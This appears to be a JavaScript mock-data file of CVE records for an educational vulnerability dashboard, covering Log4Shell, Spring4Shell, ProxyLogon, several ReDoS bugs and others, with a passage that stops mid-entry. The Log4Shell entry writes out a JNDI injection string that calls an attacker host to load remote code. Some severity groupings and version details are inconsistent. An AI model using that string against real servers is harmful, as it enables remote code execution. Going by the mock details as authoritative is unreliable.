/**
 * VulnGuard Mock Data Service
 * 
 * Contains realistic vulnerability data for educational purposes.
 * Each entry follows the CVE (Common Vulnerabilities and Exposures) format
 * with CVSS v3.1 scoring, exploitability information, and remediation guidance.
 * 
 * Key concepts demonstrated:
 * - CVSS Scoring: 0-10 scale measuring severity
 * - CWE: Common Weakness Enumeration (vulnerability categories)
 * - Exploitability: How easily a vulnerability can be exploited
 * - Transitive dependencies: Vulnerabilities in dependencies of dependencies
 */

export const vulnerabilities = [
  // ============================================================
  // CRITICAL VULNERABILITIES (CVSS 9.0-10.0)
  // ============================================================
  {
    id: "CVE-2021-44228",
    name: "Log4Shell - Remote Code Execution",
    cweId: "CWE-917",
    cweName: "Improper Neutralization of Special Elements used in an Expression Language Statement",
    package: "log4j-core",
    packageVersion: "2.0-beta9 - 2.14.1",
    affectedVersions: ["2.0-beta9", "2.0", "2.1", "2.2", "2.3", "2.4", "2.5", "2.6", "2.7", "2.8", "2.9", "2.10", "2.11", "2.12", "2.13", "2.14.1"],
    fixedVersion: "2.15.0",
    cvssScore: 10.0,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "CHANGED",
      confidentiality: "HIGH",
      integrity: "HIGH",
      availability: "HIGH"
    },
    severity: "CRITICAL",
    exploitability: "KNOWN_EXPLOIT",
    exploitDetails: "Publicly available exploits exist. Massively exploited in the wild starting December 10, 2021. Attackers can trigger RCE via specially crafted log messages containing JNDI lookup strings like ${jndi:ldap://attacker.com/exploit}.",
    fixAvailable: true,
    discoveryDate: "2021-12-09",
    publicationDate: "2021-12-10",
    daysDiscovered: 827,
    description: "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.",
    technicalDetails: "The vulnerability exists in the JNDI (Java Naming and Directory Interface) lookup feature of Log4j. When a log message contains a string like ${jndi:ldap://attacker.com/exploit}, Log4j fetches and executes a remote Java class. This allows full Remote Code Execution (RCE) with the privileges of the application server.",
    impact: "Complete system compromise via Remote Code Execution. Attacker gains full control of affected systems. Can exfiltrate data, install ransomware, pivot to internal networks.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
      "https://logging.apache.org/log4j/2.x/security.html",
      "https://github.com/advisories/GHSA-jfh8-c2jp-jvvd"
    ],
    relatedCVEs: ["CVE-2021-45046", "CVE-2021-45105", "CVE-2021-44832"],
    remediation: "Upgrade log4j-core to version 2.15.0 or later. For Log4j 2.x (<=2.14.1): set log4j2.formatMsgNoLookups=true or remove JndiLookup class from classpath.",
    remediationSteps: [
      "Immediately identify all systems using log4j-core",
      "Upgrade to log4j-core 2.17.1 or later",
      "If immediate upgrade isn't possible, set JVM flag: -Dlog4j2.formatMsgNoLookups=true",
      "Block LDAP/RMI outbound connections at the firewall",
      "Monitor logs for JNDI injection attempts",
      "Rotate all credentials on affected systems"
    ],
    dependencyPath: ["app", "spring-boot", "log4j-core"],
    project: "Backend API"
  },
  {
    id: "CVE-2022-22965",
    name: "Spring4Shell - Remote Code Execution",
    cweId: "CWE-94",
    cweName: "Improper Control of Generation of Code",
    package: "spring-webmvc",
    packageVersion: "5.3.0 - 5.3.17",
    affectedVersions: ["5.3.0", "5.3.1", "5.3.5", "5.3.10", "5.3.17"],
    fixedVersion: "5.3.18",
    cvssScore: 9.8,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "HIGH",
      integrity: "HIGH",
      availability: "HIGH"
    },
    severity: "CRITICAL",
    exploitability: "POC",
    exploitDetails: "Proof-of-concept exploits publicly available. Exploitation requires the application to be deployed on Apache Tomcat as a WAR file with JDK 9+. Active exploitation observed.",
    fixAvailable: true,
    discoveryDate: "2022-03-31",
    publicationDate: "2022-03-31",
    daysDiscovered: 350,
    description: "A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit.",
    technicalDetails: "The vulnerability exploits the ClassLoader access via data binding in Spring MVC. Attackers can manipulate the class.module.classLoader.resources.context.parent.pipeline.first properties to achieve RCE through Tomcat's AccessLogValve.",
    impact: "Remote Code Execution leading to complete system compromise. Particularly dangerous in enterprise Spring Boot applications.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2022-22965",
      "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement"
    ],
    relatedCVEs: ["CVE-2022-22963", "CVE-2022-22950"],
    remediation: "Upgrade to Spring Framework 5.3.18+ or 5.2.20+. Apply WAF rules to block malicious requests.",
    remediationSteps: [
      "Upgrade Spring Framework to 5.3.18 or 5.2.20",
      "If upgrade is not immediately possible, apply WAF rules",
      "Ensure application is deployed as Spring Boot fat JAR (not WAR on Tomcat)",
      "Monitor for exploitation attempts in application logs"
    ],
    dependencyPath: ["app", "spring-boot-starter-web", "spring-webmvc"],
    project: "Backend API"
  },
  {
    id: "CVE-2021-26855",
    name: "ProxyLogon - Microsoft Exchange RCE",
    cweId: "CWE-918",
    cweName: "Server-Side Request Forgery (SSRF)",
    package: "microsoft-exchange",
    packageVersion: "2013 - 2019",
    affectedVersions: ["Exchange 2013", "Exchange 2016", "Exchange 2019"],
    fixedVersion: "March 2021 CU",
    cvssScore: 9.8,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "HIGH",
      integrity: "HIGH",
      availability: "HIGH"
    },
    severity: "CRITICAL",
    exploitability: "KNOWN_EXPLOIT",
    exploitDetails: "Actively exploited by nation-state actors (HAFNIUM). Over 250,000 servers compromised globally within days of disclosure.",
    fixAvailable: true,
    discoveryDate: "2021-01-05",
    publicationDate: "2021-03-02",
    daysDiscovered: 744,
    description: "Microsoft Exchange Server Remote Code Execution Vulnerability. An authentication bypass vulnerability that allows an attacker to impersonate any user and access email accounts.",
    technicalDetails: "SSRF vulnerability in Exchange that bypasses authentication, combined with post-auth arbitrary file write to achieve RCE.",
    impact: "Complete Exchange server compromise, email exfiltration, lateral movement in enterprise networks.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2021-26855",
      "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855"
    ],
    relatedCVEs: ["CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"],
    remediation: "Apply Microsoft security patches released March 2021. Deploy Exchange Emergency Mitigation Tool if patching is delayed.",
    remediationSteps: [
      "Apply the security update immediately",
      "Run Microsoft MSERT tool to detect IOCs",
      "Check for signs of compromise (web shells, new admin accounts)",
      "Review Exchange access logs",
      "Consider isolating Exchange from internet temporarily"
    ],
    dependencyPath: ["infrastructure", "microsoft-exchange"],
    project: "Infrastructure"
  },
  {
    id: "CVE-2023-44487",
    name: "HTTP/2 Rapid Reset Attack (DDoS)",
    cweId: "CWE-400",
    cweName: "Uncontrolled Resource Consumption",
    package: "node",
    packageVersion: "< 20.10.0",
    affectedVersions: ["18.0.0", "18.12.0", "20.0.0", "20.8.0"],
    fixedVersion: "20.10.0",
    cvssScore: 7.5,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "NONE",
      integrity: "NONE",
      availability: "HIGH"
    },
    severity: "HIGH",
    exploitability: "KNOWN_EXPLOIT",
    exploitDetails: "Novel DDoS attack technique abusing HTTP/2 stream cancellation. Used in record-breaking DDoS attacks reaching 398 million requests/second.",
    fixAvailable: true,
    discoveryDate: "2023-08-01",
    publicationDate: "2023-10-10",
    daysDiscovered: 157,
    description: "The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild between August and October 2023.",
    technicalDetails: "Attackers send a rapid sequence of HTTP/2 HEADERS frames followed immediately by RST_STREAM frames, forcing the server to process requests it then immediately cancels. This exhausts server resources.",
    impact: "Complete service unavailability. Record-breaking DDoS attacks observed in the wild.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2023-44487",
      "https://cloud.google.com/blog/products/identity-security/google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps"
    ],
    relatedCVEs: ["CVE-2023-35945"],
    remediation: "Update Node.js to 20.10.0 or later. Configure HTTP/2 connection limits and request rate limiting.",
    remediationSteps: [
      "Update Node.js to version 20.10.0+",
      "Configure SETTINGS_MAX_CONCURRENT_STREAMS to limit parallel streams",
      "Implement DDoS protection at the CDN/WAF layer",
      "Monitor for unusual traffic patterns"
    ],
    dependencyPath: ["app", "node"],
    project: "Frontend App"
  },
  {
    id: "CVE-2022-3786",
    name: "OpenSSL X.509 Email Buffer Overflow",
    cweId: "CWE-120",
    cweName: "Buffer Copy without Checking Size of Input",
    package: "openssl",
    packageVersion: "3.0.0 - 3.0.6",
    affectedVersions: ["3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6"],
    fixedVersion: "3.0.7",
    cvssScore: 7.5,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "NONE",
      integrity: "NONE",
      availability: "HIGH"
    },
    severity: "HIGH",
    exploitability: "POC",
    exploitDetails: "Buffer overrun vulnerability in X.509 certificate verification. PoC exploit demonstrated but no widespread exploitation.",
    fixAvailable: true,
    discoveryDate: "2022-10-01",
    publicationDate: "2022-11-01",
    daysDiscovered: 500,
    description: "A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer.",
    technicalDetails: "A crafted X.509 certificate with a specially crafted email address field can cause a buffer overrun in OpenSSL's certificate parsing code.",
    impact: "Denial of Service. Potential for Remote Code Execution in limited scenarios.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2022-3786",
      "https://www.openssl.org/news/secadv/20221101.txt"
    ],
    relatedCVEs: ["CVE-2022-3602"],
    remediation: "Upgrade OpenSSL to version 3.0.7 or later.",
    remediationSteps: [
      "Audit all systems using OpenSSL 3.0.x",
      "Upgrade to OpenSSL 3.0.7 immediately",
      "Restart all services using OpenSSL",
      "Verify certificate validation behavior"
    ],
    dependencyPath: ["app", "node-tls", "openssl"],
    project: "Backend API"
  },

  // ============================================================
  // HIGH VULNERABILITIES (CVSS 7.0-8.9)
  // ============================================================
  {
    id: "CVE-2023-38408",
    name: "OpenSSH Remote Code Execution via ssh-agent",
    cweId: "CWE-428",
    cweName: "Unquoted Search Path or Element",
    package: "openssh",
    packageVersion: "< 9.3p2",
    affectedVersions: ["8.0", "8.5", "9.0", "9.2", "9.3"],
    fixedVersion: "9.3p2",
    cvssScore: 9.8,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "HIGH",
      integrity: "HIGH",
      availability: "HIGH"
    },
    severity: "CRITICAL",
    exploitability: "POC",
    exploitDetails: "Remote code execution via the OpenSSH agent. Requires ssh-agent forwarding to be enabled.",
    fixAvailable: true,
    discoveryDate: "2023-07-19",
    publicationDate: "2023-07-19",
    daysDiscovered: 240,
    description: "The PKCS#11 feature in ssh-agent in OpenSSH before 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if an agent is forwarded to an attacker-controlled system.",
    technicalDetails: "When ssh-agent forwarding is used and the agent is connected to a malicious SSH server, the server can instruct the agent to load PKCS#11 modules from arbitrary paths.",
    impact: "Remote Code Execution on developer machines with ssh-agent forwarding enabled.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2023-38408",
      "https://www.qualys.com/2023/07/19/cve-2023-38408/rce-openssh-forwarded-ssh-agent.txt"
    ],
    relatedCVEs: [],
    remediation: "Update OpenSSH to version 9.3p2 or later. Disable ssh-agent forwarding when not needed.",
    remediationSteps: [
      "Update OpenSSH to 9.3p2+",
      "Disable ForwardAgent in SSH configuration unless explicitly needed",
      "Audit SSH agent usage in deployment pipelines"
    ],
    dependencyPath: ["infrastructure", "openssh"],
    project: "Infrastructure"
  },
  {
    id: "CVE-2023-29017",
    name: "vm2 Sandbox Escape RCE",
    cweId: "CWE-74",
    cweName: "Improper Neutralization of Special Elements in Output Used by a Downstream Component",
    package: "vm2",
    packageVersion: "< 3.9.15",
    affectedVersions: ["3.9.0", "3.9.5", "3.9.10", "3.9.14"],
    fixedVersion: null,
    cvssScore: 9.8,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "HIGH",
      integrity: "HIGH",
      availability: "HIGH"
    },
    severity: "CRITICAL",
    exploitability: "KNOWN_EXPLOIT",
    exploitDetails: "vm2 has been deprecated with no fix. Multiple sandbox escape vulnerabilities allow RCE on the host.",
    fixAvailable: false,
    discoveryDate: "2023-04-06",
    publicationDate: "2023-04-06",
    daysDiscovered: 344,
    description: "A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. vm2 has been officially deprecated with no maintainer and no fix available.",
    technicalDetails: "Multiple separate vulnerabilities in vm2's sandbox mechanism allow escaping to the host process. The library is no longer maintained.",
    impact: "Complete host system compromise. The package is deprecated and should be replaced.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2023-29017",
      "https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5"
    ],
    relatedCVEs: ["CVE-2023-30547", "CVE-2023-32314"],
    remediation: "Replace vm2 with a maintained alternative like 'isolated-vm'. There is no fix available for vm2.",
    remediationSteps: [
      "Remove vm2 from all projects immediately",
      "Migrate to 'isolated-vm' or 'quickjs-emscripten'",
      "Review all code using vm2 for sandbox requirements",
      "Test replacement library thoroughly before deployment"
    ],
    dependencyPath: ["app", "code-executor", "vm2"],
    project: "Code Runner Service"
  },
  {
    id: "CVE-2021-23337",
    name: "lodash Command Injection",
    cweId: "CWE-77",
    cweName: "Improper Neutralization of Special Elements used in a Command",
    package: "lodash",
    packageVersion: "< 4.17.21",
    affectedVersions: ["4.0.0", "4.5.0", "4.10.0", "4.17.15", "4.17.20"],
    fixedVersion: "4.17.21",
    cvssScore: 7.2,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "HIGH",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "HIGH",
      integrity: "HIGH",
      availability: "HIGH"
    },
    severity: "HIGH",
    exploitability: "POC",
    exploitDetails: "Command injection via template function. Requires the attacker to control template strings passed to _.template().",
    fixAvailable: true,
    discoveryDate: "2021-02-15",
    publicationDate: "2021-02-15",
    daysDiscovered: 758,
    description: "lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function. Successful exploitation requires the attacker to control the template content.",
    technicalDetails: "The _.template() function in lodash allows arbitrary code execution when user-controlled input is passed directly without sanitization.",
    impact: "Remote Code Execution if user-controlled data is passed to lodash template functions.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2021-23337",
      "https://snyk.io/vuln/SNYK-JS-LODASH-1040724"
    ],
    relatedCVEs: ["CVE-2021-23337", "CVE-2020-8203"],
    remediation: "Upgrade lodash to version 4.17.21 or later.",
    remediationSteps: [
      "Run: npm update lodash",
      "Verify lodash version is 4.17.21+",
      "Audit all uses of _.template() for user-controlled input",
      "Consider switching to safer alternatives for template generation"
    ],
    dependencyPath: ["app", "express-utils", "lodash"],
    project: "Backend API"
  },
  {
    id: "CVE-2022-37434",
    name: "zlib Heap Buffer Overflow",
    cweId: "CWE-122",
    cweName: "Heap-based Buffer Overflow",
    package: "zlib",
    packageVersion: "< 1.2.12.1",
    affectedVersions: ["1.2.9", "1.2.10", "1.2.11", "1.2.12"],
    fixedVersion: "1.2.12.1",
    cvssScore: 9.8,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "HIGH",
      integrity: "HIGH",
      availability: "HIGH"
    },
    severity: "CRITICAL",
    exploitability: "THEORETICAL",
    exploitDetails: "Theoretical heap buffer overflow in inflate() function. No known widespread exploitation.",
    fixAvailable: true,
    discoveryDate: "2022-08-05",
    publicationDate: "2022-08-05",
    daysDiscovered: 588,
    description: "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected.",
    technicalDetails: "A specially crafted gzip file with an extra-large header can trigger a heap buffer overflow in zlib's inflate() function.",
    impact: "Potential Remote Code Execution via crafted compressed data streams.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2022-37434",
      "https://zlib.net/ChangeLog.txt"
    ],
    relatedCVEs: [],
    remediation: "Upgrade zlib to version 1.2.12.1 or later.",
    remediationSteps: [
      "Update zlib to 1.2.12.1+",
      "Rebuild any statically-linked binaries using zlib",
      "Test decompression functionality after update"
    ],
    dependencyPath: ["app", "node-zlib-backport", "zlib"],
    project: "Data Processing Service"
  },
  {
    id: "CVE-2023-0464",
    name: "OpenSSL X.509 Policy Denial of Service",
    cweId: "CWE-400",
    cweName: "Uncontrolled Resource Consumption",
    package: "openssl",
    packageVersion: "1.0.2 - 3.0.x",
    affectedVersions: ["1.0.2", "1.1.0", "1.1.1", "3.0.0", "3.0.8"],
    fixedVersion: "3.0.9",
    cvssScore: 7.5,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "NONE",
      integrity: "NONE",
      availability: "HIGH"
    },
    severity: "HIGH",
    exploitability: "POC",
    exploitDetails: "DoS via X.509 certificate chain with specially crafted policy constraints. PoC available.",
    fixAvailable: true,
    discoveryDate: "2023-03-22",
    publicationDate: "2023-03-22",
    daysDiscovered: 358,
    description: "A security vulnerability has been identified in all supported versions of OpenSSL related to the verification of X.509 certificate chains that include policy constraints. Verification of such chains may be very slow, leading to denial-of-service (DoS).",
    technicalDetails: "Verification of X.509 certificate chains with deeply nested policy constraints can cause exponential time complexity.",
    impact: "Denial of Service on TLS-enabled services through malicious certificate submission.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2023-0464",
      "https://www.openssl.org/news/secadv/20230322.txt"
    ],
    relatedCVEs: ["CVE-2022-3786", "CVE-2022-3602"],
    remediation: "Upgrade OpenSSL to 3.0.9+ or 1.1.1t+.",
    remediationSteps: [
      "Upgrade OpenSSL to the latest version",
      "Disable X.509 policy verification if not required",
      "Monitor TLS handshake performance"
    ],
    dependencyPath: ["app", "https-module", "openssl"],
    project: "Backend API"
  },

  // ============================================================
  // MEDIUM VULNERABILITIES (CVSS 4.0-6.9)
  // ============================================================
  {
    id: "CVE-2022-24434",
    name: "Dicer ReDoS via multipart/form-data",
    cweId: "CWE-1333",
    cweName: "Inefficient Regular Expression Complexity",
    package: "dicer",
    packageVersion: "< 0.3.1",
    affectedVersions: ["0.2.5", "0.3.0"],
    fixedVersion: "0.3.1",
    cvssScore: 5.3,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "NONE",
      integrity: "NONE",
      availability: "LOW"
    },
    severity: "MEDIUM",
    exploitability: "POC",
    exploitDetails: "ReDoS vulnerability in Content-Type header parsing. Slow regex can be exploited with crafted multipart requests.",
    fixAvailable: true,
    discoveryDate: "2022-03-01",
    publicationDate: "2022-03-01",
    daysDiscovered: 745,
    description: "dicer npm package before 0.3.1 is vulnerable to Regular Expression Denial of Service (ReDoS) via the Content-Type header parser.",
    technicalDetails: "A malformed Content-Type header can cause catastrophic backtracking in the regex parser, consuming excessive CPU time.",
    impact: "Denial of Service through slow request processing. Applications processing file uploads may be affected.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2022-24434",
      "https://snyk.io/vuln/SNYK-JS-DICER-2311509"
    ],
    relatedCVEs: [],
    remediation: "Upgrade busboy (which includes dicer) to version 1.0.0 or later.",
    remediationSteps: [
      "Update busboy to 1.0.0+",
      "npm audit fix",
      "Test multipart form handling after update"
    ],
    dependencyPath: ["app", "multer", "busboy", "dicer"],
    project: "File Upload Service"
  },
  {
    id: "CVE-2022-25881",
    name: "http-cache-semantics ReDoS",
    cweId: "CWE-1333",
    cweName: "Inefficient Regular Expression Complexity",
    package: "http-cache-semantics",
    packageVersion: "< 4.1.1",
    affectedVersions: ["4.0.0", "4.1.0"],
    fixedVersion: "4.1.1",
    cvssScore: 7.5,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "NONE",
      integrity: "NONE",
      availability: "HIGH"
    },
    severity: "HIGH",
    exploitability: "POC",
    exploitDetails: "ReDoS in HTTP header parsing allowing DoS. Craft a long malicious cache-control header.",
    fixAvailable: true,
    discoveryDate: "2023-01-26",
    publicationDate: "2023-01-26",
    daysDiscovered: 414,
    description: "http-cache-semantics before 4.1.1 allows input to run for an exponential amount of time. An attacker can craft a header value, send it to a server using the package, and cause a denial of service.",
    technicalDetails: "The cache-control header parser uses a regex susceptible to catastrophic backtracking on malformed input.",
    impact: "Server-side Denial of Service through malformed Cache-Control headers.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2022-25881",
      "https://snyk.io/vuln/SNYK-JS-HTTPCACHESEMANTICS-3248783"
    ],
    relatedCVEs: [],
    remediation: "Upgrade http-cache-semantics to 4.1.1 or later.",
    remediationSteps: [
      "npm update http-cache-semantics",
      "npm audit fix",
      "Test HTTP caching behavior"
    ],
    dependencyPath: ["app", "got", "cacheable-request", "http-cache-semantics"],
    project: "API Gateway"
  },
  {
    id: "CVE-2023-26115",
    name: "word-wrap ReDoS",
    cweId: "CWE-1333",
    cweName: "Inefficient Regular Expression Complexity",
    package: "word-wrap",
    packageVersion: "< 1.2.4",
    affectedVersions: ["1.2.0", "1.2.1", "1.2.2", "1.2.3"],
    fixedVersion: "1.2.4",
    cvssScore: 5.3,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "NONE",
      integrity: "NONE",
      availability: "LOW"
    },
    severity: "MEDIUM",
    exploitability: "THEORETICAL",
    exploitDetails: "ReDoS via carefully crafted input. Impact is limited to DoS in most use cases.",
    fixAvailable: true,
    discoveryDate: "2023-06-22",
    publicationDate: "2023-06-22",
    daysDiscovered: 266,
    description: "All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable.",
    technicalDetails: "The regular expression used for word wrapping can be triggered to run in polynomial time on specially crafted input.",
    impact: "Low impact DoS in applications using word-wrap for text processing.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2023-26115",
      "https://snyk.io/vuln/SNYK-JS-WORDWRAP-3149813"
    ],
    relatedCVEs: [],
    remediation: "Upgrade word-wrap to version 1.2.4 or later.",
    remediationSteps: [
      "npm update word-wrap",
      "npm audit fix"
    ],
    dependencyPath: ["app", "eslint", "word-wrap"],
    project: "Developer Tools"
  },
  {
    id: "CVE-2022-46175",
    name: "JSON5 Prototype Pollution",
    cweId: "CWE-1321",
    cweName: "Improperly Controlled Modification of Object Prototype Attributes",
    package: "json5",
    packageVersion: "< 2.2.2",
    affectedVersions: ["2.0.0", "2.1.0", "2.2.0", "2.2.1"],
    fixedVersion: "2.2.2",
    cvssScore: 8.8,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "LOW",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "HIGH",
      integrity: "HIGH",
      availability: "HIGH"
    },
    severity: "HIGH",
    exploitability: "POC",
    exploitDetails: "Prototype pollution via specially crafted JSON5 input. Can lead to RCE in some Node.js configurations.",
    fixAvailable: true,
    discoveryDate: "2022-12-24",
    publicationDate: "2022-12-24",
    daysDiscovered: 447,
    description: "Versions of the package json5 before 2.2.2 are vulnerable to Prototype Pollution via the parse method of the JSON5 library. An attacker can provide a crafted input and inject arbitrary properties into JavaScript objects.",
    technicalDetails: "The JSON5 parser allows __proto__ keys in parsed objects, enabling prototype pollution that can affect all objects in the JavaScript runtime.",
    impact: "Prototype pollution can lead to property injection, DoS, or RCE depending on how the application uses parsed data.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2022-46175",
      "https://snyk.io/vuln/SNYK-JS-JSON5-3182856"
    ],
    relatedCVEs: [],
    remediation: "Upgrade json5 to version 2.2.2 or later.",
    remediationSteps: [
      "npm update json5",
      "Verify json5 version is 2.2.2+",
      "Audit code parsing untrusted JSON5 input",
      "Add input validation for JSON5 data"
    ],
    dependencyPath: ["app", "webpack", "json5"],
    project: "Build System"
  },
  {
    id: "CVE-2021-3918",
    name: "json-schema Prototype Pollution",
    cweId: "CWE-1321",
    cweName: "Improperly Controlled Modification of Object Prototype Attributes",
    package: "json-schema",
    packageVersion: "< 0.4.0",
    affectedVersions: ["0.2.0", "0.2.3"],
    fixedVersion: "0.4.0",
    cvssScore: 9.8,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "NONE",
      scope: "UNCHANGED",
      confidentiality: "HIGH",
      integrity: "HIGH",
      availability: "HIGH"
    },
    severity: "CRITICAL",
    exploitability: "POC",
    exploitDetails: "Prototype pollution via validate() function. Can be exploited remotely in Node.js applications.",
    fixAvailable: true,
    discoveryDate: "2021-11-13",
    publicationDate: "2021-11-13",
    daysDiscovered: 823,
    description: "json-schema is vulnerable to Prototype Pollution via the validate() function. An attacker can pass specially crafted JSON with __proto__ keys that can modify the prototype of all JavaScript objects.",
    technicalDetails: "JSON schema validation does not sanitize __proto__ keys in input objects, allowing prototype pollution.",
    impact: "Prototype pollution potentially leading to Remote Code Execution or application-wide state corruption.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2021-3918",
      "https://snyk.io/vuln/SNYK-JS-JSONSCHEMA-1920922"
    ],
    relatedCVEs: [],
    remediation: "Upgrade json-schema to version 0.4.0 or later.",
    remediationSteps: [
      "npm update json-schema",
      "Test JSON schema validation after update",
      "Consider switching to Ajv or Joi for JSON validation"
    ],
    dependencyPath: ["app", "request", "jsprim", "json-schema"],
    project: "API Service"
  },
  {
    id: "CVE-2022-0536",
    name: "follow-redirects Private Info Leak",
    cweId: "CWE-601",
    cweName: "URL Redirection to Untrusted Site",
    package: "follow-redirects",
    packageVersion: "< 1.14.8",
    affectedVersions: ["1.14.0", "1.14.5", "1.14.7"],
    fixedVersion: "1.14.8",
    cvssScore: 6.5,
    cvssVector: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
    cvssComponents: {
      attackVector: "NETWORK",
      attackComplexity: "LOW",
      privilegesRequired: "NONE",
      userInteraction: "REQUIRED",
      scope: "UNCHANGED",
      confidentiality: "HIGH",
      integrity: "NONE",
      availability: "NONE"
    },
    severity: "MEDIUM",
    exploitability: "THEORETICAL",
    exploitDetails: "Sensitive headers like Authorization can be leaked to third-party servers during HTTP redirects.",
    fixAvailable: true,
    discoveryDate: "2022-02-09",
    publicationDate: "2022-02-09",
    daysDiscovered: 769,
